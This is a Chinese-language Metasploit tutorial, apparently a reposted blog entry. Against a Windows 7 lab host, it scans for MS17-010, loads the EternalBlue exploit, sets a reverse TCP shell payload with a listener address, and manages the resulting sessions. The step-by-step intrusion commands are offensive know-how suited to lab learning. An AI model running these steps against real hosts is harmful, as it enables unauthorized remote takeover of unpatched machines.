metasploit渗透测试

使用msf渗透Win7主机,并远程执行命令

整体流程

已知漏洞→查找模块→配置程序→执行exploit

查找模块:

search MS17-...
show exploits
show payloads
show auxiliary

配置程序:

显示参数:
show options
show targets
show encoders
show advanced
info xxx
----------
设置参数:
use xxx(exploit)
set xxx(payload)
set xxx xxx(参数)

执行exploit:

exploit(命令)
run(命令)

任务开始

查找该漏洞的扫描模块

msf5 > search ms17-010
------
auxiliary/scanner/smb/smb_ms17_010 (这是一个扫描模块)

 加载模块

msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) >

查看设置哪些参数

msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

设置目标HOSTS

msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.255.150

查看设置的HOSTS

msf5 auxiliary(scanner/smb/smb_ms17_010) > show options
RHOSTS       192.168.255.150

执行攻击命令开始扫描该主机

msf5 auxiliary(scanner/smb/smb_ms17_010) > run

查找该漏洞的攻击模块

msf5 > search ms17-010
---------
exploit/windows/smb/ms17_010_eternalblue (永恒之蓝)

 加载该模块

msf5 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) >

检查要设置的参数

msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

 设置靶机的HOSTS

msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.255.150
RHOSTS => 192.168.255.150

查看可以复现的系统

msf5 exploit(windows/smb/ms17_010_eternalblue) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

使用攻击载荷(payload)设置本地监听

msf5 exploit(windows/smb/ms17_010_eternalblue) > search windows/shell
--------
payload/windows/shell/reverse_tcp

设置攻击载荷(payload)

msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp

显示设置的参数

设置本地端口和IP

msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.255.200 LPORT 4444
LHOST => 192.168.255.200 LPORT 4444

 执行攻击命令

msf5 exploit(windows/smb/ms17_010_eternalblue) > run

拿到shell后解决乱码问题

C:Windwossystem32> chcp 65001

Ctrl+C断开连接

渗透成功之后将会话保存到后台

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit -j

  

 查看保存到后台的会话

msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions

启用这个会话

session -i [会话ID]

msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 2

进入会话后想返回而不丢失这个会话,[返回并保持到后台]

C:Windowssystem32>background
Background session 2? [y/N] y

清理这个会话

msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions -k 2
[*] Killing the following session(s): 2

show options参数列表说明

参数解释
Name 参数名称
Current Setting 默认值
Required 是否必须设置
Description 参数的描述

总结使用metasploit攻击的步骤

  • 1、查找CVE公布的漏洞

  • 2、查找对应的exploit模块

  • 3、配置模块参数

  • 4、添加payload后门

  • 5、执行exploit开始攻击

原文地址:https://www.cnblogs.com/MineLSG/p/13780219.html